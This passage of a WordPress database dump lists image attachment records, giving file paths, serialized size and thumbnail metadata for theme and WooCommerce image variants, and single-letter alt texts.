a','a:5:{s:5:\"width\";i:1206;s:6:\"height\";i:485;s:4:\"file\";s:25:\"2018/09/h5-rev-img-2b.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2b-300x121.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:121;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"h5-rev-img-2b-1024x412.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2b-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2b-768x309.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:309;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2b-650x485.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:485;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2b-650x485.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:485;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"h5-rev-img-2b-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2b-600x241.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:241;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2b-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2b-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2b-600x241.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:241;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"h5-rev-img-2b-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51894,2720,'_wp_attached_file','2018/08/h4-img-1-1.jpg'),(51895,2720,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:679;s:4:\"file\";s:22:\"2018/08/h4-img-1-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"h4-img-1-1-300x170.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:170;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"h4-img-1-1-1024x579.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:579;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"h4-img-1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"h4-img-1-1-768x435.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:435;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:22:\"h4-img-1-1-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"h4-img-1-1-1200x650.jpg\";s:5:\"width\";i:1200;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:22:\"h4-img-1-1-650x679.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:679;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"h4-img-1-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"h4-img-1-1-600x340.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:340;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"h4-img-1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"h4-img-1-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"h4-img-1-1-600x340.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:340;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"h4-img-1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51896,2758,'_wp_attached_file','2018/09/landing-vector-img-9.png'),(51897,2758,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:393;s:6:\"height\";i:248;s:4:\"file\";s:32:\"2018/09/landing-vector-img-9.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-9-300x189.png\";s:5:\"width\";i:300;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-9-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"landing-vector-img-9-300x248.png\";s:5:\"width\";i:300;s:6:\"height\";i:248;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-9-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-9-300x248.png\";s:5:\"width\";i:300;s:6:\"height\";i:248;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-9-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51898,2562,'_wp_attached_file','2018/09/h4-rev-img-1b.jpg'),(51899,2562,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:966;s:6:\"height\";i:557;s:4:\"file\";s:25:\"2018/09/h4-rev-img-1b.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1b-300x173.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1b-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1b-768x443.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:443;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1b-650x557.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:557;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1b-650x557.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:557;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"h4-rev-img-1b-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1b-600x346.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:346;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1b-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1b-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1b-600x346.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:346;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"h4-rev-img-1b-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51900,2758,'_wp_attachment_image_alt','a'),(51901,2777,'_wp_attachment_image_alt','m'),(51902,2204,'_wp_attachment_image_alt','m'),(51903,2865,'_wp_attachment_image_alt','m'),(51904,2778,'_wp_attached_file','2018/09/landing-img-17.jpg'),(51905,2778,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:451;s:4:\"file\";s:26:\"2018/09/landing-img-17.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"landing-img-17-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-17-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"landing-img-17-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:26:\"landing-img-17-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:26:\"landing-img-17-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"landing-img-17-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"landing-img-17-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-17-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:26:\"landing-img-17-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"landing-img-17-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-img-17-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51906,2720,'_wp_attachment_image_alt','d'),(51907,2222,'_wp_attached_file','2018/08/kitchen-img-gallery-3.jpg'),(51908,2222,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1300;s:4:\"file\";s:33:\"2018/08/kitchen-img-gallery-3.jpg\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:35:\"kitchen-img-gallery-3-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-3-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-3-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:34:\"kitchen-img-gallery-3-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:34:\"kitchen-img-gallery-3-650x1300.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"attika_mikado_image_huge\";a:4:{s:4:\"file\";s:35:\"kitchen-img-gallery-3-1300x1300.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:1300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"kitchen-img-gallery-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-3-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-3-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"kitchen-img-gallery-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51909,2562,'_wp_attachment_image_alt','m'),(51910,2910,'_wp_attached_file','2018/09/h1-img-1.png'),(51911,2910,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:504;s:6:\"height\";i:57;s:4:\"file\";s:20:\"2018/09/h1-img-1.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"h1-img-1-300x34.png\";s:5:\"width\";i:300;s:6:\"height\";i:34;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"h1-img-1-150x57.png\";s:5:\"width\";i:150;s:6:\"height\";i:57;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"h1-img-1-300x57.png\";s:5:\"width\";i:300;s:6:\"height\";i:57;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"h1-img-1-100x57.png\";s:5:\"width\";i:100;s:6:\"height\";i:57;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"h1-img-1-300x57.png\";s:5:\"width\";i:300;s:6:\"height\";i:57;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"h1-img-1-100x57.png\";s:5:\"width\";i:100;s:6:\"height\";i:57;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51912,2910,'_wp_attachment_image_alt','d'),(51913,2761,'_wp_attached_file','2018/09/landing-img-3.jpg'),(51914,2761,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:451;s:4:\"file\";s:25:\"2018/09/landing-img-3.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"landing-img-3-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"landing-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"landing-img-3-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:25:\"landing-img-3-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:25:\"landing-img-3-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"landing-img-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"landing-img-3-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"landing-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"landing-img-3-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"landing-img-3-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"landing-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51915,2778,'_wp_attachment_image_alt','m'),(51916,2721,'_wp_attached_file','2018/08/h4-img-2-1.jpg'),(51917,2721,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:679;s:4:\"file\";s:22:\"2018/08/h4-img-2-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"h4-img-2-1-300x170.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:170;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"h4-img-2-1-1024x579.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:579;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"h4-img-2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"h4-img-2-1-768x435.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:435;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:22:\"h4-img-2-1-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"h4-img-2-1-1200x650.jpg\";s:5:\"width\";i:1200;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:22:\"h4-img-2-1-650x679.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:679;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"h4-img-2-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"h4-img-2-1-600x340.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:340;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"h4-img-2-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"h4-img-2-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"h4-img-2-1-600x340.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:340;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"h4-img-2-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51918,2564,'_wp_attached_file','2018/09/h4-rev-img-1b-1.jpg'),(51919,2564,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:858;s:6:\"height\";i:495;s:4:\"file\";s:27:\"2018/09/h4-rev-img-1b-1.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"h4-rev-img-1b-1-300x173.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"h4-rev-img-1b-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"h4-rev-img-1b-1-768x443.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:443;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:27:\"h4-rev-img-1b-1-650x495.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:495;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:27:\"h4-rev-img-1b-1-650x495.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:495;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"h4-rev-img-1b-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a